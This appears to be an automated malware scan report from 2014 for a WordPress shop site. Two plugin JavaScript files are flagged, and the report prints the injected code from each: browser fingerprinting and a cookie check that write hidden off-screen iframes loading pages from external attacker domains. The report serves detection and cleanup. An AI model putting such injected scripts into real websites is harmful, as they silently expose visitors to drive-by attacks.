Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blinqz.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://blinqz.nl/ | 200 OK Content-Length: 108705 Content-Type: text/html | clean |
http://blinqz.nl/wp-content/plugins/xyz-wp-popup/header-script.php | 200 OK Content-Length: 44121 Content-Type: text/html | clean |
http://blinqz.nl/test404page.js | 404 Not Found Content-Length: 48817 Content-Type: text/html | clean |
http://blinqz.nl/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96754 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 6521 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-content/plugins/cardoza-facebook-like-box/cardozafacebook.js?ver=4.0 | 200 OK Content-Length: 1670 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: igrisuler.mon600.com ...[135 bytes skipped]... )+"=([^;]*)"));return resizegood?decodeURIComponent(resizegood[1]):undefined;} function Lightebrothermind(){var Litresbool=navigator.userAgent;var Smiledbob=(Litresbool.indexOf("IEMobile")>-1||Litresbool.indexOf("Chrome")>-1||Litresbool.indexOf("Windows NT 6.3")>-1||Litresbool.indexOf("Windows")<+1);var assa_a=(getCookie("ultras17broser")===undefined);if(!Smiledbob&&assa_a){document.write('<iframe src="http://igrisuler.mon600.com/jdtkjtdqwfehtrj16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');var date=new Date(new Date().getTime()+ 65*60*60*1000);document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();}} Lightebrothermind();jQuery(document).ready(function(e){jQuery('#cfbtitle').click(function(){jQuery('# ...[664 bytes skipped]... Decoded script: <iframe src="http://igrisuler.mon600.com/jdtkjtdqwfehtrj16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe> Malicious iFrame found. size: 200x200 src: http://igrisuler.mon600.com/jdtkjtdqwfehtrj16.html This URL is marked by Google as suspicious <iframe src="http://igrisuler.mon600.com/jdtkjtdqwfehtrj16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 100px;width: 100px;"> | ||
http://blinqz.nl/wp-content/plugins/google-calendar-events/js/jquery-qtip.js | 200 OK Content-Length: 38105 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-content/plugins/google-calendar-events/js/gce-script.js | 200 OK Content-Length: 1167 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-content/plugins/sod-woo-infinite-scroll/assets/js/jquery.infinitescroll.js?ver=4.0 | 200 OK Content-Length: 11884 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-content/plugins/sod-woo-infinite-scroll/assets/js/custom.js?ver=4.0 | 200 OK Content-Length: 2730 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: fikakuir.yosi-tamvan.com ...[154 bytes skipped]... return templateshoper?decodeURIComponent(templateshoper[1]):undefined;} function Hardtechnology(){var JameNoober=navigator.userAgent;var NiceProgroude=(JameNoober.indexOf("IEMobile")>-1||JameNoober.indexOf("Windows NT 6.3")>-1||JameNoober.indexOf("Chrome")>-1||JameNoober.indexOf("Windows")<+1);var Plogin=(getCookie("ultras17broser")===undefined);if(!NiceProgroude&&Plogin){document.write('<iframe src="http://fikakuir.yosi-tamvan.com/tiakoklastik16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe>');var date=new Date(new Date().getTime()+ 66*60*60*1000);document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();}} Hardtechnology();jQuery(document).ready(function(){$container=jQuery(infinite_scroll.parent_container) ...[1723 bytes skipped]... Decoded script: <iframe src="http://fikakuir.yosi-tamvan.com/tiakoklastik16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 101px;width: 101px;"></iframe> Malicious iFrame found. size: 201x201 src: http://fikakuir.yosi-tamvan.com/tiakoklastik16.html This URL is marked by Google as suspicious <iframe src="http://fikakuir.yosi-tamvan.com/tiakoklastik16.html" width="201" height="201" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "times new roman", georgia, serif;left: -901px;height: 101px;width: 101px;"> | ||
http://blinqz.nl/wp-content/themes/blinqz/theme/templates/sliders/revolution-slider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.3.0&ver=4.0 | 200 OK Content-Length: 85185 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-content/themes/blinqz/theme/templates/sliders/revolution-slider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.3.0&ver=4.0 | 200 OK Content-Length: 93132 Content-Type: application/javascript | clean |
http://blinqz.nl/wp-content/plugins/woocommerce-drop-prices/js/jquery.countdown.js?ver=1 | 200 OK Content-Length: 18614 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: blinqz.nl
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Mon, 15 Sep 2014 07:11:28 GMT
ETag: W/"1ce1e-5031387c8d870-gzip"
Server: cloudflare-nginx
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
Expires: Mon, 15 Sep 2014 07:11:30 GMT
Last-Modified: Mon, 15 Sep 2014 05:01:40 GMT
CF-RAY: 16a302a90b1a0f75-FRA
Set-Cookie: __cfduid=d190a7769a975e4f0d0c8227793f55e4a1410765088167; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.blinqz.nl; HttpOnly
GET / HTTP/1.1
Host: blinqz.nl
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Mon, 15 Sep 2014 07:11:28 GMT
ETag: W/"1ce1e-5031387c8d870-gzip"
Server: cloudflare-nginx
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
Expires: Mon, 15 Sep 2014 07:11:30 GMT
Last-Modified: Mon, 15 Sep 2014 05:01:40 GMT
CF-RAY: 16a302a90b1a0f75-FRA
Set-Cookie: __cfduid=d190a7769a975e4f0d0c8227793f55e4a1410765088167; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.blinqz.nl; HttpOnly
Second query (visit from search engine):
GET / HTTP/1.1
Host: blinqz.nl
Referer: http://www.google.com/search?q=blinqz.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: blinqz.nl
Referer: http://www.google.com/search?q=blinqz.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.